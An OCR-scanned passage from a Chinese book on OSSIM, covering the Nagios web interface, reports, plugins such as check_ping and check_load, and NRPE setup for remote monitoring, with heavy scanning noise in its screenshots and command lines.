个 CGI 文件 交互 。 下 面 单 击 “Service Detail” 超 链接 ， 如 图 8-57 所 示 。 


AVAILABILITY o 
MONITORING REPORTING 
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NETWORK OUTAGES | COMMENTS | DOWNTIME | PROCESS INFO | PERFORMANCE INFO | SCHEDULING QUEUE 
WIENER DIET ERE Host Status Totals Service Status Totals 
VIEW NOTIFICATIONS FOR ALL HOSTS Up | Down Unreachable ^ Pending Ok | Warning Unknown | Critical | Pending | 
VIEW HOST STATUS DETAIL FOR ALL EN o 0 0 0 0 0 0 
HOSTS 
All Problems All Types All Problems All Types 
0 2 0 7 m 
Service Status Details For All Hosts eR 
4 
Limit Results: 100 3 
Host *9 — | Service *9 | Status * Last Check *& Duration ** —— Attempt 会 各 Status Information - S] 
set Ime 2015-01-05 00:41:03 Od Oh 44m 2s 1/4 SSH OK - OpenSSH_6.0p1 Debian-4 (protocol ż 
localhost (© CurrentLoad OR 2015-01-05 00:41:05 1d 4h 19m 44s 1⁄4 OK - load average: 0.08, 0.13, 0.12 
Current Users [OK 2015-01-05 00:40:20 1d 4h 18m 54s 1/4 USERS OK - 2 users currently logged in 
Disk Space — [30K 2015-01-05 00:42:00 1d 4h 18m 4s 1/4 DISK OK 


HTTP OK: HTTP/1.1 302 Found - 415 bytes in 0.0 
second response time 
SSH OK - OpenSSH. 5.5p1 Debian-G«squeeze4 


SSH ;0.0; 00:41:10 1d 4h 16m 24s 1/4 CAZ 


HTTP e000 1d 4h 17m 14s 1/4 


Total 2015-01-05 00:42:45 1d 4h 15m 34s 1/4 PROCS OK: 116 processes 
Processes 


Results 1 - 7 of 7 Matching Services 


图 8-57 显示 服务 详情 
单 击 上 面 这 些 菜 单 会 发 现 , 每 次 打开 的 界面 有 个 共同 点 , 前 七 个 菜单 ， 它 们 显示 了 四 个 部 


基于 上 一 个 链接 的 子 菜单 ， 提 供 快捷 链接 。 

主机 状态 表 (Host Status Totals ) ， 展 示 区 域 中 的 主机 状态 。 
服务 状态 表 (Service Status Totals) ， 展 示 区 域 中 的 服务 状态 。 
细节 展示 区 域 。 
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下 面 我 们 单 击 图 中 主机 127.0.0.1， 如 图 8-58 所 示 。 


SENSOR: 'localhost. $ 


Host Status: 

Status Information: 
Performance Data: 
Current Attempt: 

Last Check Time: 

Check Type. 

Check Latency / Duration: 


Next Scheduled Active Check: 


Last State Change: 
Last Notification: 

Is This Host Flapping? 
In Scheduled Downtime? 
Last Update: 


Active Checks: "ENABLED 
Passive Checks: ENABLED. 
obsessing — ENABLED. 
Notifications. ENABLED 
Event Handler. "ENABLED 
Flap Detection: "ENABLED. 


该 图 显示 的 是 某 台 主机 的 详细 信息 , 大 家 可 以 看 到 ,只 有 主机 状态 


ICE DETAIL | HOST DETAIL | S 
NE 


Host 


localhost 
(localhost) 


Member of 
127.0.0.1 


( Debian GNU/Linux ) 
Deblan GNU/Linux servers. 


Host State Information 
UP! (for 1d 4h 20m 595) 
PING OK - Packet loss = OX, RTA = 0.04 ms. 
rta-0.043000ms;5000.000000;5000.000000;0.000000 pl-0%100;100;0 
1/10 (HARD state) 
2015-01-05 00:44:18 
ACTIVE 
0.138 / 0.005 seconds 
2015-01-05 00:49:19 
2015-01-03 20:25:21 
N/A (notification 0) 
BNO (0.00% state change) 
NO 


2015-01-05 00:46:19 (0d Oh Om 15 ago) 


Host Comments 
D Add a new comment | Delete all comments. 


Author ^ Comment — CommentiD ^ Persistent 
This host has no comments associated with it 


8-58 ”显示 主机 详情 


Entry Time. 


没有 直接 显示 出 来 ， 但 在 上 图 左 侧 显示 了 一 个 详细 的 菜单 : 


VIEW STATUS DETAIL FOR THIS HOST 

VIEW ALERT HISTORY FOR THIS HOST 

VIEW TRENDS FOR THIS HOST 

VIEW ALERT HISTOGRAM FORTHIS HOST 
VIEW AVAILABILITY REPORT FOR THIS HOST 


@ VIEW NOTIFICATIONS FOR THIS HOST 
以 上 这 些 菜 单 可 以 显示 主机 详细 状态 。 主 机 状态 细节 展示 Host Status Detail， 如 图 8-59 所 


第 8 章 量 OSSIM 流 


all, debian-servers, http-servers, ssh-servers 


) | STATUS MAP | SERVICE PROBLEMS | HOST PROBLEMS 


zl 
S'I DOWNTIME | PROCESS INFO | PERFORMANCE INFO | SCHEDULING QUEUE 


Host Commands 


à Locate host on map. 
X Disable active checks of this host. 
C) Resschedule the next check of this host. 
7? Submit passive check result for this host 
X Stop accepting passive checks for this host 
X Stop obsessing over this host 
X Disable notifications for this host 
F Send custom host notification 
© Schedule downtime for this host 
© Schedule downtime for all services on this host. 
X Disable notifications for all services on this host. 
sZ Enable notifications for all services on this host 
© Schedule a check of all services on this host. 
X Disable checks of all services on this host 
WA Enable checks of all services on this host 
X Disable event handler for this host 
X Disable flap detection for this host 


Type | Expires — Actions 


信息 ， 服 务 端口 信息 并 
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维 平台 


OSSIM 最 佳 实践 


MONITORING REPORTING 


SENSOR: / localhost. SERVICE DETAIL | HOST DETAIL | STATUS OVERVIEW | STATUS CRID | STATUS MAP | SERVICE PROBLEMS | HOST PROBLE 


NETWORK OUTAGES | COMMENTS | DOWNTIME | PROCESS INFO | PERFORMANCE INFO | SCHEDULING QUE 


VIEW SERVICE STATUS DETAIL FOR sq Service Status Totals; 
ALL HOST GROUPS Up Down | Unreachable | Pending Ok | Warning | Unknown ` Critical | Pending | 
VIEW STATUS OVERVIEW FOR ALL EH c o o EM c o o o 


HOST GROUPS 
VIEW STATUS SUMMARY FOR ALL 
HOST GROUPS 


& 


All Problems — All Types - All Problems . All Types. 


tec] 


VIEW STATUS CRID FOR ALL HOST 9 z s 5 
GROUPS 
Host Status Details For All Host qne 
Groups 

Umit Results: 100 5 
(... Host ** — Sut *é ———— LastChek e Duration * Status Information. 
HSEISZYGETEOS ER TURIS 2015-01-05 00:57:00 od 1h 3m 2s PING OK - Packet loss = OX, RTA = 0.50 
R A 2015-01-05 00:54:25 1d 4h 33m 29s PING OK - Packet loss = OX, RTA = 0.04 ms 


图 8-59 主机 细节 


选择 页 面 右上 侧 的 View Status Overview for all host groups 和 View Host Status detail for all 
host groups 菜单 ， 这 两 个 菜单 非常 实用 ， 它 在 一 屏 内 ， 按 主机 组 分 组 ， 显 示 了 监控 环境 整体 状 
态 。 如 图 8-60 所 示 。 当 管理 的 主机 数量 达到 上 百 台 时 ， 它 集中 展示 了 所 有 主机 和 服务 的 状态 ， 


总 体 展示 当前 环境 。 


AVAILABILITY o 
MOMTORNG irontina 
SENSOR: eneo X] X | HOST DETAI | STATUS OVERVIE STATUS MAP | SERVICE PROBLEMS | HOST PROBI 
a Host Status Totals Service Status Totals 
VIEW STATUS OVERVIEW FOR AL HOS Up Dowm | unreachable | Pending Ok warning | unknown Cra | Pending 
VIEW STATUS SUMMARY FOR Ai u mum o o mm > 0 E ^ 
VIEW STATUS GRID FOR ALL HOST GROU 
Ail Problems | AN Types Ail Problems | Ali Types 
m— 0$ m— = 
Service Status Details For All Host Groups 
Umit Rasulss [160 v. 
[Series 放生 | statu iasChek *$ | Duration S$ | attempt #8 Status Toformelion 
MIT Gevenc Ton ss BR 20:5-0:-06 02:28:09 0a anam ioo aya TOP OK - 0:003 second response tmo on port 53 
me WARMING — 20150406 098315: casha0m37s 4/4 HTTP WARNING: KCT9/10 401 Unauthorized - 406 bytes in 2.013 second response tene 
ke | sro sme mma aya MTTP WARNING: TTO 0 a0: maneraed san byens 10 cci response tine 
TELNET ER 2015-01-06 03:26:15 0d 4h 24m 135 E TCP OK - 0.003 second response time on port 23 
Woe ctNeNc rcp o M 2015-01-06 02:28:57 0 10h aam ais — o TCP OK - 0.004 second response time on port 443 
we E 2015-01-06 03:28:05 04 19h 34m 23s 1/4 HTTP OK: HTTP/1.1 302 Found - 425 bytes in 0.018 second response time 
sen R201-01-%6 03:32:21 coeni0078 —— ye SSH Ok - OcenSSH 5.501 Debian-6+squee7e4 [protocol 2.0) 
re eos eme mm SSH OK - OpenSsH_6.0p1 Debian-4 (orotocol 2.0) 
Host 192-168- 6ENERIC_TCP_135 2015-01-06 03:28:22 0d1sh33n 6s 1⁄4 TCP OK - 0.002 second response time on port 135 
SENERIC_TcP_lag ME 2015-01-06 03:28:28 0 ah zemos 1/4 TCP OK - 0.003 second responsa time on port 139 
Host-192-168- a FTP OK- 0:005 second resanse time on port 21 [220 win2k Microsoft FTP Service 
mea "m | IDE deme 
GENERIC TCP 135 MEMOR 2015-01-06 03:30:01 0d 3h 7m 27s 1⁄4 TCP OK - 0.001 second response time on port 135 
GENERIC TCP_139 MBR 2015-01-06 03:29:34 0c 7h 7m 54s 1/4 TCP OK - 0.002 second response time on port 139 
GENERIC_TCP_443 MEOR 2015-01-06 03:30:16 0d 7h 37m 125 ve TCP OK - 0.005 second response time on port 443. 
GENERIC 7CP 55 M 2017-01-06 03:29:52 Od 3h 7m 36s 1/4 TEP OK - 0.004 second response time on port 445 
mp E 2015-01-06 03:27:41 0d ih som azs — ye HTTP OK: HTTP/1.1 200 OK - 1727 bytes in 0.010 second rasponse time 
SMTP INNEN 2015-0106 03:30:23. od 7n 32m Ss Ys SMTP OK - 0.010 sec. response tima 
hona E DI TCP OK - 0.001 second response time on port 139 
GENERIC_TCP_445 BN 2015-01-06 03:28:07 04 4n23m 41s — Y^ TCP OK - 0.002 second responso time on port 445 
Ryu E à 2015-01-08 02:20:29 02 101 azm sos 1/6 TCP OK - 0.003 second response time on por 443 
me WARNING — 201501.0605:2227 03 4h 20m 15 aa HIT WARING: HTTP: 1 402 Forbidden - 4184 bytes in 0.007 second response tme 
SSH E 2015 -01 -06 03:27:53 0d hl9m35 — 14 ESH OK - OpenSSH 3,952 (protoco 1.99) 
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图 3-60 ”所 有 主机 组 预览 


988 € OSSIM 流量 分 析 与 监控 


2. Reporting ( 报表 ) 


Nagios 中 内 置 了 丰富 的 报表 功能 ， 负 责 提供 报表 功能 的 程序 也 是 CGI 程序 。 主 要 分 为 以 
下 几 种 : 


Trends， 趋 势 图 ( 能 够 直观 地 再 现 服务 状态 与 时 间 之 间 的 关系 ) 。 
Availability， 可 用 性 。 

Event Histogram， 事 件 直 方 图 (或 柱状 图 ) 。 

Event History， 事 件 历史 。 

Event Summary， 事 件 汇总 。 

Notifications， 通 知 。 

€ Performance info， 性 能 日 志 。 


单 击 相应 报表 类 型 ， 系 统 会 提示 指定 对 象 类 型 ， 以 生成 相应 的 报表 。 例 如 , 我 们 单 击 可 用 
性 报表 ， 观 察 趋势 图 。 首 先 选 择 Trends 按钮 ， 如 图 8-61 所 示 。 


X 


AVAILABILITY 


MONITCRING REPORTING 


SENSOR: [a 


NDS | AVAILABILITY | EVENT HISTOGRAM | EVENT HISTORY | EVENT SUMMARY | NOTIFICATIONS | PERFOR 
Host 'Host-192-168-11-242" 


[村 
2015-01-06 00:00:00 to 2015-01-06 03:22:24 
Duration: 0d 3h 22m 245 


大 家 观察 趋势 图 时 ， 主 要 看 X 轴 ， 在 该 图 中 X 轴 表 示 时 间 ， 而 Y 轴 则 表示 服务 状态 〈 正 
常 、 警 告 、 未 知 、 严 重 )。 

直方 图 的 设置 方法 大 致 和 趋势 图 一 样 ， 直 方 图 和 趋势 图 的 区 别 就 在 X 轴 上 。 假 如 报表 的 
周期 为 7 天， 趋势 图 中 的 X 轴 对 应 的 就 是 7 天 中 的 每 一 天 ，Y 轴 就 是 服务 状态 例如 正常 、 
警告 、 严 重 、 未 知 )， 在 该 图 中 记录 了 服务 状态 和 时 间 的 关系 ， 如 图 8-62 所 示 。 

而 直方 图 在 X 轴 上 显示 用 户 自 定义 的 故障 统计 的 时 间 间 隔 ， 比 如 每 天 的 小 时 数 ， 每 周 的 
天 数 。 在 Y 轴 显 示 故障 状态 的 数量 。 例 如 ， 选 择 周期 为 最 近 7 天 ， 故 障 统计 的 时 间 间 隔 为 每 
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天 24 小时， 那么 义 轴 显示 24 个 小 格 ， 每 格 代表 1 小 时 ，Y 轴 会 显示 故障 状态 在 每 个 小 时 发 
生 的 次 数 总 和 。 这 样 表示 更 有 助 于 通过 可 视 化 展现 服务 区 故障 的 发 展 趋势 。 比 如 ， 服 务 器 A 
的 CPU 利用 率 很 高 ， 那 么 在 直方 图 上 就 能 展现 出 每 周 ， 某 一 个 时 间 (晚上 12 点 ) 服务 器 A 
的 CPU 利用 率 。 


AVAILABILITY 1 


TRENDS | AVAILABILITY | EVENT HISTOGRAM | EVENT HISTORY | E 


Host 'Host-192-168-11-237" 


2015-01-05 00:00:00 to 2015-01-06 00:00:00 
Duration: 1d oh om 0s 


Event. History For Host ^ost-L92-149-11-237" 
Tien Jan 5 00:00:00 2015 to Tue Jan 6 00:00:00 2015 


Naber of Events 
REIR. 


Mweo*osrEOEdARAESSSRRSNRARERERAGZ- 


图 8-62 事件 直方 图 


8.6.4 Naigos 插件 
Nagios 的 插件 才 是 真 英雄 ， 没 有 Nagios 如 同一 个 空 克 ， 插 件 的 工作 步骤 如 下 : 
o ”从 被 监控 主机 上 收集 信息 。 
e 将 收集 信息 与 靖 值 进行 比较 。 
€ 根据 比较 结果 ， 提 供 对 应 退出 返回 码 (0、1、2、3) 。 
1. 理解 插件 


插件 如 何 而 来 ， 我 们 先 来 看 个 最 简单 的 例子 。 编 写 一 个 ping 脚本 ， 它 的 功能 是 向 服务 器 
192.168.11.108 (也 可 以 使 用 hostname 的 形式 ) 发 送 5 个 ICMP 包 , 与 使 用 ping 命令 不 同 的 是 ， 
这 个 脚本 提供 了 退出 代码 ， 如 果 成 功 ping 通 ， 则 退出 代码 为 0， 如 果 ping 不 通 ， 那 么 表示 有 
故障 ， 退 出 代码 为 2。 脚 本 内 容 如 图 8-63 所 示 。 
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图 8-63 ping 脚本 


不 过 输出 0、2， 只 有 程序 员 知 道 什么 意思 ， 对 于 不 懂得 什么 是 退出 代码 的 用 户 来 说 没有 


帮助 ， 下 面 继续 优化 这 个 脚本 ， 通 过 标准 输出 息 。 如 图 8-64 所 示 。 


图 8-64 ”改进 型 ping 脚本 


在 该 脚本 中 ， 使 用 OUTPUT 变量 ， 搭 配 tail 命令 来 获取 ping 命令 输出 的 最 后 两 行 信息 ， 
这 个 脚本 执行 结果 如 图 8-65 所 示 。 


图 8-65 脚本 执行 
此 时 ,大 家 是 不 是 对 插件 的 作用 有 所 体会 ? 在 Nagios 的 架构 工作 方式 中 , 最 大 的 好 处 是 ， 
能 够 通过 命令 行 执行 插件 ， 非 常 方便 扩展 ， 因 为 每 个 插件 都 是 一 个 独立 的 小 脚本 。 以 OSSIM 
为 例 ， 在 /usr/lib/nagios/plugins/ 目 录 下 存 有 大 量 插件 ， 每 个 插件 还 可 以 调用 帮助 信息 ， 例 如 : 
#./check ping -h 
在 继续 下 面 的 命令 之 前 ， 先 确保 OSSIM 能 连接 互联 网 ， 测 试 命令 如 图 8-66 所 示 。 
#./check ping -H 8.8.8.8 -w 200,20$ -c 300,50$ -p 3 -t 2 
lienvault:/usr/lib^nagios/pluginstt .7/check ping -H 8.8.8.8 -w 200,207» -c 300,50 


: -p 3 -t 2 
ING WARNING - Packet loss = 33%, RTA = 243.30 mslIrta=243.304001ms :200 .000000;30 


0 .000000;0.000000 p1-337:20:50:0 
lienvault:^/usr/lib/nagios/pluginsit 


图 8-66 ”插件 执行 


各 参数 含义 如 下 : 


e -H: 主机 地 址 。 
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-w: WARNING 警告 状态 : 响应 时 间 (EH), EFA), B. 
-: CRITICAL 危险 状态 : 响应 时 间 (EH), EPA), Mii. 
-p: 发 送 的 包 数 ， 默 认 5 个 包 

超时 时 间 ， 默 认 10 秒 。 

这 样 可 以 是 操作 者 对 插件 问题 进行 故障 分 析 。 如 果 Nagios 在 调用 某 个 插件 时 出 现 了 问 
题 ， 我 们 可 以 在 shell 提示 符 下 直接 运行 插件 ， 并 加 入 相同 参数 ， 查 看 具体 发 生 了 什么 问题 。 
大 家 如 果 需 要 了 解 插件 问题 ， 还 可 以 参考 https://nagios-plugins.org/doc/guidelines.html。 

在 OSSIM 系统 中 已 安装 好 naigos-plugins-1.4.15， 在 /usr/lib/naigos/plugins/ 目 录 下 有 很 多 
check 开头 的 二 进 制 文件 ， 它 们 即 为 Nagios 插件 ， 部 分 插件 如 图 8-67 所 示 。 


ios/plugins# ls 
heck apt e check jabber check nntp check radius check_time 
:heck_bgpstate _fping check_ldap check_nntps eal 
heck breeze check_ftp check_ldaps check nt check rpc 
check gane check linux raid — check ntp check rta multi 
check host check load ETUR check_sensors 
check hp jd T check ntp tine 


check http “mai check nustat ^ check sntp 
chec eck nr check oracle ^ check snnp utils ,pm 
check ide smart check m check overcr — check spop utils.sh 
check ifoperstatus J check pgsql check ssh 

check ping check tp 
check_imap check mysql que check pop check suap 
check ircd check nagi check procs check tcp 


图 8-67 Nagios 插件 
系统 并 没有 提供 每 个 监控 程序 的 脚本 的 说 明文 档 , 想 了 解 这 些 脚 本 如 何 工 作 的 话 , 可 以 通 
过 --h 参数 ， 显 示 其 使 用 方法 和 参数 。 例 如 : #/check_icmp -h， 根 据 提示 的 方法 ， 可 以 在 命令 
: 试 使 用 以 下 命令 (如 图 8-68 所 示 ): 


Aplug ins# ./check icmp -H sina .com 
ina .com: rta 151 s, lost OzIrta-151.072ms:;200.000;500.000:0; pl1=0x;40;89;; rtnax-152.519ns 
; rtnin-150.319ns 
al ienvault :7usr71 ibznag ios/plug insit 


图 8-68 插件 帮助 信息 
从 返回 结果 可 以 看 到 状态 值 “OK”， 以 及 一 些 详细 的 数据 
下 面 我 们 来 看 看 其 他 插件 功能 的 例子 : 


(1) Check load 检测 负载 ， 通 过 
check_load 是 检查 系统 正在 运行 的 任务 数 + 等 待 的 任务 数 ， 如 图 8- 8-69 所 示 。 


lienvault:/usr^/lib/nagios^/pluginstit ./check load -w 15,10,5 -c 30,25,20 
K — load average: 1.74, 0.67, 0.48110ad1-1.740:15.000:30.000;0; load5-0.670:10. 


000:25.000:0; 10ad15-0.480:5.000:20.000:0; 
lienvault:/usr/lib/nagios/plugins# 


图 8-69 检测 负载 
当 1 分 钟 多 个 进程 等 待 ，5 分 钟 多 于 10 个 ，15 分 钟 多 于 5 个 ， 则 为 warning 状态 。 
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当 1 分钟 多 于 30 个 进程 等 待 ，5 分 钟 多 于 25 个 ，15 分 钟 多 于 20 个 ， 则 为 critical 状态 。 


(2) Check_swap 检测 交换 分 区 ， 如 图 8-70 所 示 。 


lienvault:/usr/lib/nagios/plugins# ./check_swap -w 207 -c 107 


SWAP OK - 1007 free (865 MB out of 865 MB) Isuap-865MB:173:86:0:865 
lienvault:/usr/lib/nagios/plugins# 


图 8-70 ”检测 交换 分 区 


(3) 检查 内 存 

当 使 用 NRPE 时 ， 这 条 命令 会 检测 空闲 的 内 存 ， 当 可 用 内 存 小 于 20% 时 会 发 出 警告 ， 并 
上 且 在 可 用 内 存 小 于 10% 时 会 生成 一 个 严重 和 警告。 在 Nagios 监控 中 ,默认 是 没有 check mem 这 
个 插件 ， 为 了 完成 下 面 的 实验 ， 首 先 到 我 的 博客 下 载 check mem.pl 脚本 (如 图 8-71 所 示 )。 


alienvault: 
Fwxmwxmul 


m.pl C 


check mem -f -w 20 -c 


alienvault:/usr/lib/na 


图 8-71 检查 内 存 
如 果 你 看 到 类 似 上 面 那 样 的 输出 ， 则 表示 该 命令 正常 ， 接 下 来 需要 定义 NRPE 检查 内 存 
使 用 率 的 命令 。 


#vi /etc/nagios/nrpe.cfg 


加 入 以 下 内 容 : 


command[check mem]-/usr/lib/nagios/plugins/check mem -f -w 20 -c 10 


(4) 检测 FTP 服务 ， 效 果 如 图 8-72 所 示 。 


lienvault:/usr/lib/nagios/plugins#t ./check_ftp -H localhost -p 21 
[FTP OK - 0.002 second response time on port 21 [220 (usFTPd 2.3.2)]1Itime=0.00203| 


s:::0.000000; 10.000000 
Alienuault:vusrzlibynagioszplug ins# 


图 8-72 ”检测 服务 


远程 获取 信息 
在 该 实验 中 ， 我 们 通过 SSH 获取 远程 主机 的 负载 信息 ， 首 先 要 把 密 钥 对 中 的 公 钥 ， 复 制 
到 要 访问 的 机 器 中 ， 并 保存 为 ~/.ssh/authorized_keys。 该 实验 可 以 形象 理解 Nagios 在 远程 服务 
器 上 运行 插件 的 情形 。 下 面 我 们 要 查询 远程 系统 的 负载 平均 值 ， 由 于 做 了 上 面 的 准备 工作 , 我 
们 输入 以 下 命令 (将 该 命令 保存 文件 名 为 load_check.sh): 


#ssh 192.168.11.108 "uptime |cut -d: -f5" 


此 时 会 在 远程 服务 器 192.168.11.108 上 ， 输 出 1 分 钟 、5 分 钟 、15 分 钟 的 平均 负载 信息 
当 把 这 个 脚本 存放 在 远程 服务 器 的 /usr/local/bin/ 目 录 后 ,管理 员 就 可 以 通过 SSH 远程 支持 ， 类 
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似 如 下 命令 : 


#ssh 192.168.11.108 "/usr/local/bin/load check.sh" 


会 通过 cron 命令 ， 在 远程 服务 器 192.168.11.108. 上 调度 计划 任务 定期 执 


实际 上 管理 员 还 
文 行 命令 稍 加 变形 ， 加 入 退出 码 ， 就 变 成 如 图 8-73 所 示 的 脚本 。 


行 。 将 上 面 这 


图 8-73 脚本 


开始 检验 成 果 ， 这 时 考虑 Nagios 如 何 执行 远 端 命令 呢 ? 难道 只 能 在 本 地 执行 ? 答案 很 简 
单 ， 只 需要 使 用 SSH 就 可 以 搞定 。 这 种 方式 就 是 Nagios 远程 执行 的 基础 。 但 由 于 认证 等 问题 ， 
以 上 介绍 的 SSH 的 方式 ， 从 技术 上 可 以 实现 ， 但 从 安全 角度 并 不 理想 ， 所 以 就 用 到 了 NRPE 
(远程 插件 执行 程序 )，NRPE 是 完全 跨 平台 的 ， 它 可 以 运行 在 Windows 和 UNIX 平台 上 。 

安装 好 的 每 个 插件 都 是 可 以 独立 使 用 ， 那 么 在 Nagios 中 ， 如 何 调用 这 些 插件 的 呢 ? 如 果 
要 加 入 参数 ， 需 要 用 哪 种 格式 呢 ? 首先 ， 要 了 解 这 些 插件 会 被 Nagios 用 在 什么 地 方 。Nagios 
有 很 多 个 cfg 文件 ， 用 来 定义 各 式 各 样 的 信息 ， 其 中 hosts.cfg 和 services.cfg 〈 一 般 是 这 两 个 ， 
也 可 能 是 其 他 定义 主机 和 服务 的 配置 文件 ) 是 用 来 定义 主机 和 服务 信息 。 这 些 插件 就 被 使 用 在 
这 里 。 例 如 ， 在 OSSIM 系统 中 服务 ! 
services/alienvault-alienvaultSSH.cfg (i1 
如 图 8-74 所 示 。 


定义 nagios fE/etc/nagios3/conf.d/ossim-configs/host- 
alienvault-alienvault 为 设 定 的 主机 名 ) 配置 文件 中 ， 


/etc/nagios3/conf .d/ossim-conf igs/host-services# cat alienvault-alienvaultSSH.cfg 
1 
nane alienvault-alienvault 
ption SSH 
_command check_ssh 
ic-service 
tion interual 120 


ssim-conf igs/ha ruic s 
ENERIC_TCP_3000.cfg alienvau G 2 TCP 8080.cfg 
-443， e alienuault alienu aultSSH.cfg 


图 8-74 cfg 配置 文件 
Host name 项 说 明 该 服务 所 在 的 主机 名 ，service_descrition 项 为 说 明 信 息 ， 这 项 内 容 会 显 
示 在 Nagios 页 面 上 ， 所 以 尽量 简洁 明了 。 这 个 服务 定义 了 naigos 需要 监控 的 内 容 和 手段 ， 以 
及 用 check. ssh 插件 来 监控 主机 alienvault-alienvualt 上 的 SSH 服务 。 
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3. 主机 监控 

Nagios 的 主要 功能 是 监控 ， 其 监控 对 象 包括 主机 和 服务 。 针 对 主机 监控 的 配置 项 都 是 怎 
样 的 呢 ? 在 OSSIM 系统 中 , 对 于 主机 监控 信息 存放 在 /etc/nagios3/conf.d/ossim-configs/hosts H 
录 下 ， 文 件 特征 是 ip.cfg， 如 图 8-75 所 示 。 


alienvault: /etc. Dots conf i s/hostst ls 
14.155.cfg 10.32.14.21.cfg ^ 192.168.56.28.cfg 


4.20.cfg 10.32. .cfg 
im | cat 10.32.14.133.cfg 


ienvault-alienuault 
1t-alienuault 


use generic-host 
} 
alienvault:/etc/znagios3/conf .d/ossin-conf igszhoststt 


图 8-75 主机 监控 配置 文件 


IP 代表 监控 主机 的 IP 地 址 ， 如 例子 中 的 10.32.14.128、10.32.14.130 等 。alias 表示 别名 ， 
可 以 更 详细 地 说 明 主 机 。address 表示 IP 地 址 。 


8.6.5 Nagios 扩展 NRPE 

NRPE 是 监控 软件 Nagios 的 一 个 扩展 ， 用 于 被 监控 的 服务 器 中 ， 向 Nagios 监控 平台 提供 
该 服务 器 的 一 些 本 地 的 情况 。 例 如 ，CPU、RAM、Disk 等 等 。NRPE 可 以 理解 为 Nagios 的 for 
Linux 客户 端 。 下 面 Sensor 充当 监控 端 服务 器 。 注 AH. 因为 NRPE 的 通信 端口 为 TCP 
5666， 所 以 确保 主机 上 这 个 端口 没有 被 占用 。 监 控 端 服务 器 〈 被 检测 主机 ) 安装 NRPE 执行 
以 下 3 条 指令 : 


#apt-get install nagios-nrpe-server 
#apt-get install nagios-nrpe-plugin 
#apt-get install libnagios-plugin-perl 


本 机 测试 : 
#nrpe -c /etc/Nagios/nrpe.cfg -d \\ 如 没有 任何 提示 表示 配置 正 


E 


接着 开始 check load 测试 ， 我 们 利用 NRPE 这 一 工具 ， 如 图 8-76 所 示 。 


rpe -H localh 


0.460;15.000;30.000;0; load5=0.650;10 . 


图 8-76 nrpe 测试 


待 调 试 完 毕 ， 在 远程 主机 上 测试 ， 不 过 需要 修改 /etc/nagios/nrpe.cfg 文件 ， 在 
allowed_hosts=127.0.0.1 之 后 ， 加 上 远程 主机 的 IP 地 址 ， 如 图 8-77 所 示 。 
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#/etc/init.d/nagios-nrpe-server \\ 重 启 服务 


c check loa 


;0; 1oad5-0.470;10. 


图 8-77 执行 check_nme 


这 样 就 不 会 报 “Could not complete SSL handshake” 错 误 。 
OSSIM Server 添加 配置 : 


#nano /etc/nagios/nrpe.cfg 
command[check disk]-/usr/lib/nagios/plugins/check disk -w 20 -c 10 


重启 NRPE 服务 : 


#/etc/init.d/nagios-nrpe-server restart 


8.6.6 ”监控 开销 

首先 ，Nagios 监控 系统 自然 也 会 消耗 一 定 的 开销 ， 主 要 被 监控 主机 上 的 CPU 资源 消耗 和 
网 络 流量 的 消耗 。Nagios 将 服务 检测 输出 到 插件 中 。 希 望 监控 系统 能 够 采用 集中 式 的 执行 方 
3C. 因为 那样 被 监控 主机 的 资源 占用 就 会 更 少 。 而 且 所 有 配置 文件 也 能 保存 在 一 个 地 方 。 事 实 
上 对 于 少量 服务 器 监控 , 这 种 想法 完全 正确 , 但 如 果 管 理 1 万 台 服 务 器 ， 那么 监控 服务 器 的 负 
担 则 会 相当 繁重 。 

采用 集中 模式 就 不 合适 。 这 种 大 型 环境 中 , 监控 服务 器 就 依赖 被 监控 主机 进行 服务 自行 检 
测 ， 然 后 把 结果 返回 给 监控 服务 器 ， 有 些 类 型 的 检测 ， 没 有 必要 在 中 心服 务 器 上 执行 ， 例 如 检 
W CPU、 内 存 以 及 磁盘 空间 等 信息 。 

其 次 就 是 带宽 的 开销 。 所 有 插件 只 要 向 中 心服 务 器 上 报 数据 ， 即 会 产生 流量 ， 所 以 需要 精 
简 插件 避免 元 余 插 件 的 存在 , 另外 , 还 需要 减少 监控 主机 的 第 三 层 路 由 流量 。 出 于 资源 的 管理 
的 考虑 ， 我 们 需要 对 资源 进行 逻辑 分 组 ， OSSIM 也 为 监控 系统 提供 了 Hostgroup〈 主 机 组 ) 的 
模块 。 

最 后 ， 使 用 主机 组 可 以 通过 对 配置 进行 优化 ， 以 满足 该 组 的 需要 ， 比 如 ， 监 控 远 程 办 公 室 
的 服务 器 的 超时 时 间 ， 可 以 设 定 得 高 一 些 ,而 本 地 服务 器 组 的 超时 时 间 则 可 降低 一 些 ， 从 而 减 
小 报警 的 数量 。 


8.6.7 OSSIM 系统 中 应 用 Nagios 监控 资源 

使 用 OSSIM 监控 资产 的 优势 就 是 它 集成 了 Nagios+OCS 这 样 的 资产 监控 工具 。 不 仅 如 此 ， 
在 OSSIM 中 设置 监控 的 过 程 也 非常 人 性 化 。 下 面 介绍 设置 的 步骤 ， 首 先 ， 在 资产 列表 栏 中 选 
中 某 个 设备 ， 进 行 如 下 几 步 操作 。 


(1) 选择 “EDITAVAILABILITY MONITORING ”编辑 可 用 性 监控 按钮 ， 如 图 8-78 所 示 。 
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ASSETS | ASSET DISCOVERY 
Assets — Asset Detgils. 
Host.10-32. E E ü 
10.32. -— 
* MORE DETAILS. 
snapshot 
1 0 0 No No 
Software Users Vulnerabilities Alarms Evens 
Packages 
GENERAL c Y c N v N 
SOFTWARE | USERS PROPERTIES EDIT AVAILABILITY MONITORING 
Search: 
IPADDRESS ort NAME VULNERABLE AVAILABLE 
732 - E tener No eno 


图 8-78 编辑 可 用 性 监控 按钮 


(2) 选择 监控 端口 后 , Mii “TOGGLE AVAILABILITY MONITORING ”按钮 ， 如 图 8-79 
所 示 。 


EDIT AVAILABILITY MONITORING 


o 
AVAILABILITY MONITORING [ LOCAL SCAN NOW ] 


TOGGLE AVAILABILITY MONITORING. 


7 


Check All | Uncheck All 


y Services 
= [V] y telnet (23/tep) [10.32. IEE] 
Version: cpe:/a:cisco:telnet 
Date: 2014-08-06 03:48:49 
Source: NMAP 
Nagios: 其 


8-79 选择 监控 端口 
EXT AVALABUTINONTORNG 


&. 


i toggles succo | 


如 果 成 功 选择 ， 系 统 提示 添加 主机 服务 成 功 。 


此 时 ， 该 设备 的 可 用 性 将 被 启用 ， 同 时 在 Availability Monitoring 处 绿色 的 圆 形 图 标 被 点 
亮 ， 如 图 8-80 所 示 。 


Snapshot 
1 0 No 
E c ENVIRONMENT STATUS 
cenw 
sorwamt | USRS | PROPERES € HIDS 


@ Automatic Asset Discovery 


8-80 


启用 监控 状态 


* Availability Monitoring |- 咕 一 一 
